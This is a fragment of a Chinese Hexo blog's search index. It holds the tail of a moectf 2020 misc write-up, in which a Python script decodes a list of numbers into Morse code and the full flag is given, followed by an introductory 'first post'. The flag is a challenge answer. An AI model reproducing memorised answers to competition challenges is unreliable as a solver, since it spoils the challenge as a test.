class="number">43983</span>,<span class="number">44523</span>,<span class="number">45333</span>,<span class="number">45603</span>,<span class="number">45873</span>,<span class="number">46143</span>,<span class="number">46413</span>,<span class="number">46683</span>,<span class="number">47493</span>,<span class="number">48033</span>,<span class="number">48843</span>,<span class="number">49113</span>,<span class="number">49383</span>,<span class="number">49923</span>,<span class="number">50193</span>,<span class="number">50463</span>,<span class="number">51273</span>,<span class="number">51813</span>,<span class="number">52083</span>,<span class="number">52623</span>,<span class="number">52893</span>,<span class="number">53433</span>,<span class="number">54243</span>,<span class="number">54783</span>,<span class="number">55053</span>,<span class="number">55323</span>,<span class="number">56133</span>,<span class="number">56673</span>,<span class="number">56943</span>,<span class="number">57483</span>,<span class="number">57753</span>,<span class="number">58023</span>,<span class="number">58833</span>,<span class="number">59373</span>,<span class="number">60183</span>,<span class="number">60453</span>,<span class="number">60723</span>,<span class="number">60993</span>,<span class="number">61263</span>,<span class="number">61533</span>,<span class="number">61803</span>,<span class="number">62073</span>,<span class="number">62883</span>,<span class="number">63153</span>,<span class="number">63423</span>,<span class="number">63693</span>,<span class="number">64503</span>,<span class="number">64773</span>,<span class="number">65043</span>,<span class="number">65313</span>,<span class="number">65583</span>,<span class="number">65853</span>,<span class="number">66663</span>,<span class="number">66933</span>,<span class="number">67203</span>,<span class="number">67473</span>,<span class="number">67743</span>,<span class="number">68283</span>,<span class="number">68553</span>,<span class="number">68823</span>,<span class="number">69633</span>,<span class="number">69903</span>,<span class="number">70173</span>,<span class="number">70713</span>,<span class="number">70983</span>,<span class="number">71253</span>,<span class="number">71523</span>,<span class="number">71793</span>,<span class="number">72603</span>,<span class="number">72873</span>,<span class="number">73143</span>,<span class="number">73683</span>,<span class="number">74493</span>,<span class="number">75033</span>,<span class="number">75303</span>,<span class="number">75843</span>,<span class="number">76113</span>,<span class="number">76383</span>,<span class="number">77193</span>,<span class="number">77733</span>,<span class="number">78003</span>,<span class="number">78543</span>,<span class="number">78813</span>,<span class="number">79083</span>,<span class="number">79893</span>,<span class="number">80163</span>,<span class="number">80433</span>,<span class="number">80703</span>,<span class="number">81513</span>,<span class="number">81783</span>,<span class="number">82053</span>,<span class="number">82323</span>,<span class="number">82593</span>,<span class="number">82863</span>,<span class="number">83133</span>,<span class="number">83673</span>,<span class="number">84483</span>,<span class="number">84753</span>,<span class="number">85563</span>,<span class="number">86103</span>,<span class="number">86373</span>,<span class="number">86643</span>,<span class="number">86913</span>,<span class="number">87453</span>,<span class="number">87723</span>,<span class="number">88263</span>,<span class="number">89073</span>,<span class="number">89613</span>,<span class="number">89883</span>,<span class="number">90423</span>,<span class="number">90693</span>,<span class="number">91233</span>,<span class="number">92043</span>,<span class="number">92313</span>,<span class="number">92583</span>,<span class="number">92853</span>,<span class="number">93123</span>,<span class="number">93663</span>,<span class="number">94473</span>,<span class="number">95013</span>,<span class="number">95823</span>,<span class="number">96363</span>,<span class="number">96633</span>,<span class="number">97173</span>,<span class="number">97443</span>,<span class="number">97983</span>,<span class="number">98793</span>,<span class="number">99063</span>,<span class="number">99333</span>,<span class="number">99873</span>,<span class="number">100143</span>,<span class="number">100413</span>,<span class="number">101223</span>,<span class="number">101493</span>,<span class="number">102303</span>,<span class="number">102573</span>,<span class="number">102843</span>,<span class="number">103383</span>,<span class="number">103653</span>,<span class="number">104193</span>,<span class="number">105003</span>,<span class="number">105273</span>,<span class="number">105543</span>,<span class="number">106083</span>,<span class="number">106893</span>,<span class="number">107163</span>,<span class="number">107433</span>,<span class="number">107973</span>,<span class="number">108243</span>,<span class="number">108513</span>,<span class="number">109323</span>,<span class="number">109863</span>,<span class="number">110133</span>,<span class="number">110403</span>,<span class="number">110673</span>,<span class="number">110943</span>,<span class="number">111753</span>,<span class="number">112293</span>,<span class="number">112563</span>,<span class="number">112833</span>,<span class="number">113103</span>,<span class="number">113643</span>,<span class="number">113913</span>,<span class="number">114453</span>,<span class="number">115263</span>,<span class="number">115803</span>,<span class="number">116073</span>,<span class="number">116613</span>,<span class="number">116883</span>,<span class="number">117423</span>,<span class="number">118233</span>,<span class="number">118503</span>,<span class="number">118773</span>,<span class="number">119043</span>,<span class="number">119313</span>,<span class="number">119853</span>,<span class="number">120663</span>,<span class="number">121203</span>,<span class="number">121473</span>,<span class="number">121743</span>,<span class="number">122013</span>,<span class="number">122283</span>,<span class="number">123093</span>,<span class="number">123633</span>,<span class="number">123903</span>,<span class="number">124443</span>,<span class="number">124713</span>,<span class="number">125253</span>,<span class="number">126063</span>,<span class="number">126603</span>,<span class="number">126873</span>,<span class="number">127143</span>,<span class="number">127953</span>,<span class="number">128493</span>,<span class="number">128763</span>,<span class="number">129303</span>,<span class="number">129573</span>,<span class="number">130113</span>,<span class="number">130923</span>,<span class="number">131463</span>,<span class="number">132273</span>,<span class="number">132543</span>,<span class="number">132813</span>,<span class="number">133353</span>,<span class="number">134163</span>,<span class="number">134433</span>,<span class="number">134703</span>,<span class="number">134973</span>,<span class="number">135243</span>,<span class="number">135783</span>,<span class="number">136053</span>,<span class="number">136323</span>,<span class="number">137133</span>,<span class="number">137403</span>,<span class="number">137673</span>,<span class="number">138213</span>,<span class="number">138483</span>,<span class="number">138753</span>,<span class="number">139563</span>,<span class="number">139833</span>,<span class="number">140103</span>,<span class="number">140643</span>,<span class="number">141453</span>,<span class="number">141723</span>,<span class="number">141993</span>,<span class="number">142263</span>,<span class="number">143073</span>,<span class="number">143613</span>,<span class="number">143883</span>,<span class="number">144153</span>,<span class="number">144423</span>,<span class="number">144693</span>,<span class="number">145503</span>,<span class="number">146043</span>,<span class="number">146313</span>,<span class="number">146853</span>,<span class="number">147123</span>,<span class="number">147663</span>,<span class="number">148473</span>,<span class="number">148743</span>,<span class="number">149013</span>,<span class="number">149283</span>,<span class="number">149553</span>,<span class="number">150093</span>,<span class="number">150363</span>,<span class="number">150633</span>,<span class="number">151443</span>,<span class="number">151713</span>,<span class="number">151983</span>,<span class="number">152253</span>,<span class="number">153063</span>,<span class="number">153603</span>,<span class="number">154413</span>,<span class="number">154683</span>,<span class="number">154953</span>,<span class="number">155223</span>,<span class="number">155493</span>,<span class="number">155763</span>,<span class="number">156573</span>,<span class="number">156843</span>,<span class="number">157113</span>,<span class="number">157653</span>,<span class="number">157923</span>,<span class="number">158193</span>,<span class="number">158463</span>,<span class="number">158733</span>,<span class="number">159543</span>,<span class="number">159813</span>,<span class="number">160623</span>,<span class="number">161163</span>,<span class="number">161433</span>,<span class="number">161703</span>,<span class="number">162513</span>,<span class="number">163053</span>,<span class="number">163323</span>,<span class="number">163863</span>,<span class="number">164133</span>,<span class="number">164403</span>,<span class="number">165213</span>,<span class="number">165753</span>,<span class="number">166563</span>,<span class="number">166833</span>,<span class="number">167103</span>,<span class="number">167373</span>,<span class="number">167643</span>,<span class="number">167913</span>,<span class="number">168183</span>,<span class="number">168453</span>,<span class="number">169263</span>,<span class="number">169533</span>,<span class="number">169803</span>,<span class="number">170073</span>,<span class="number">170883</span>,<span class="number">171423</span>,<span class="number">172233</span>,<span class="number">172503</span>,<span class="number">172773</span>,<span class="number">173043</span>,<span class="number">173853</span>,<span class="number">174123</span>,<span class="number">174393</span>,<span class="number">174663</span>,<span class="number">174933</span>,<span class="number">175203</span>,<span class="number">176013</span>,<span class="number">176553</span>,<span class="number">177363</span>,<span class="number">177633</span>,<span class="number">177903</span>,<span class="number">178173</span>,<span class="number">178443</span>,<span class="number">178713</span>,<span class="number">178983</span>,<span class="number">179253</span>,<span class="number">180063</span>,<span class="number">180333</span>,<span class="number">181143</span>,<span class="number">181413</span>,<span class="number">181683</span>,<span class="number">182223</span>,<span class="number">182493</span>,<span class="number">182763</span>,<span class="number">183573</span>,<span class="number">183843</span>,<span class="number">184113</span>,<span class="number">184383</span>,<span class="number">185193</span>,<span class="number">185733</span>,<span class="number">186003</span>,<span class="number">186543</span>,<span class="number">186813</span>,<span class="number">187083</span>,<span class="number">187893</span>,<span class="number">188163</span>,<span class="number">188433</span>,<span class="number">188703</span>,<span class="number">188973</span>,<span class="number">189243</span>,<span class="number">189513</span>,<span class="number">189783</span>,<span class="number">190593</span>,<span class="number">191133</span>,<span class="number">191943</span>,<span class="number">192213</span>,<span class="number">192483</span>,<span class="number">192753</span>,<span class="number">193023</span>,<span class="number">193563</span>,<span class="number">193833</span>,<span class="number">194103</span>,<span class="number">194913</span>,<span class="number">195183</span>,<span class="number">195453</span>,<span class="number">195993</span>,<span class="number">196263</span>,<span class="number">196533</span>,<span class="number">196803</span>,<span class="number">197073</span>,<span class="number">197883</span>,<span class="number">198153</span>,<span class="number">198423</span>,<span class="number">198963</span>,<span class="number">199773</span>,<span class="number">200313</span>,<span class="number">200583</span>,<span class="number">201123</span>,<span class="number">201393</span>,<span class="number">201663</span>]</span><br><span class="line">cnt = <span class="number">2</span></span><br><span class="line">print(change(dic[<span class="number">0</span>],dic[<span class="number">1</span>]),end=<span class="string">''</span>)</span><br><span class="line"><span class="keyword">while</span> cnt<<span class="built_in">len</span>(dic):</span><br><span class="line"><span class="keyword">if</span> dic[cnt]-dic[cnt-<span class="number">1</span>]==<span class="number">810</span>:</span><br><span class="line">print(<span class="string">'/'</span>,end=<span class="string">''</span>)</span><br><span class="line">print(change(dic[cnt],dic[cnt+<span class="number">1</span>]),end=<span class="string">''</span>)</span><br><span class="line">cnt=cnt+<span class="number">2</span></span><br><span class="line"><span class="comment"># 结果:-.--/---/..-/.-/.-././---/.../..-/--/.-/.../-/./.-./.../---/.../---/.../-/.-./---/-./--./-/..../../.../..-./.-../.-/--./--./../...-/./-.--/---/..-/-/---/.-././.--/.-/.-./-../-.--/---/..-/-../---/-./---/-/.-/..-./.-./.-/../-../---/..-./../-/.../.-.././-./--./-/..../../-/../.../-/...././.-./../--./..../-/..-./.-../.-/--.</span></span><br></pre></td></tr></table></figure><p>然后在线工具搞一下:</p><blockquote><p>YOUAREOSUMASTERSOSOSTRONGTHISFLAGGIVEYOUTOREWARDYOUDONOTAFRAIDOFITSLENGTHITISTHERIGHTFLAG</p><p>moectf{YOUAREOSUMASTERSOSOSTRONGTHISFLAGGIVEYOUTOREWARDYOUDONOTAFRAIDOFITSLENGTHITISTHERIGHTFLAG}</p></blockquote><h2 id="我没做出来的"><a href="#我没做出来的" class="headerlink" title="我没做出来的"></a>我没做出来的</h2><p>参考了<a href="%5Bhttps://dawnwhisper.github.io/2020/10/08/Moectf2020%E9%A2%98%E8%A7%A3%E4%B9%8BMisc/#more%5D(https://dawnwhisper.github.io/2020/10/08/Moectf2020%E9%A2%98%E8%A7%A3%E4%B9%8BMisc/#more)">Dawnwhisper</a>、<a href="https://blog.csdn.net/qq_45819626/article/details/108961826">-k0414-</a>和<a href="%5Bhttps://arttnba3.cn/2020/09/07/%E3%80%90CTF%E9%A2%98%E8%A7%A3-0x03%E3%80%91moeCTF2020-write-up-by-arttnb3/%5D(https://arttnba3.cn/2020/09/07/%5BCTF%E9%A2%98%E8%A7%A3-0x03%5DmoeCTF2020-write-up-by-arttnb3/)">arttnba</a>的博客,剩下的三个题目:两只企鹅,show off,以及闪电风暴(不建议看或者做……)的题解就都有了~~大家可以点击移步到各位大佬的blog里面转一转。(要是有了官方wp我还会回来更新的~</p>]]></content>
<categories>
<category> CTF比赛题解 </category>
</categories>
<tags>
<tag> CTF </tag>
<tag> wp </tag>
<tag> misc </tag>
</tags>
</entry>
<entry>
<title>My first post</title>
<link href="2020/09/27/My-first-post/"/>
<url>2020/09/27/My-first-post/</url>
<content type="html"><![CDATA[<p>这里是BB的博客,一个分享与交流的平台,欢迎各路大佬与菜菜的我交换友链~</p><p>(建议挂梯子</p><a id="more"></a><h2 id="写在前面"><a href="#写在前面" class="headerlink" title="写在前面"></a>写在前面</h2><p>一直想搭建一个blog,因为我也想在里面发一些文章来记述我的学习经历或者是生活琐碎(主要是看着nb:smirk:。之前在博客园、github上都尝试过,但是由于自己的水平问题(或者是没有找到很好的教程文章 ,之前的blog都是一副半死不活的亚子,,,文章也是一篇没发:confounded:。但,这次,我终于搭建了一个还能看的blog:joy:。感谢RX大神和其他XDSEC的<del>(野兽)</del>前辈们的指引。希望我能在这个还算奈斯的blog上常常更新,多发动态:relieved:,早日成长为大佬:stuck_out_tongue_closed_eyes:。</p><!-- more --><h2 id="自我约束"><a href="#自我约束" class="headerlink" title="自我约束"></a>自我约束</h2><p>为了督促自己的成长与进步,我要给自己立上flag::triangular_flag_on_post:::</p><ul><li>保持持久高质量更新:保质保量,一周一篇,多多益善</li><li>定期维护自己的blog,时不时的来给自己的blog上面加一些有趣的东西,那就大概一个月维护一次???:relaxed:</li></ul><p>既然是flags,那就都尽量拔掉,严格遵守自我约束!!!</p><p><strong>BB,加油!!!</strong></p>]]></content>
<categories>
<category> 杂记 </category>
</categories>
<tags>
<tag> 杂记 </tag>
</tags>
</entry>
</search>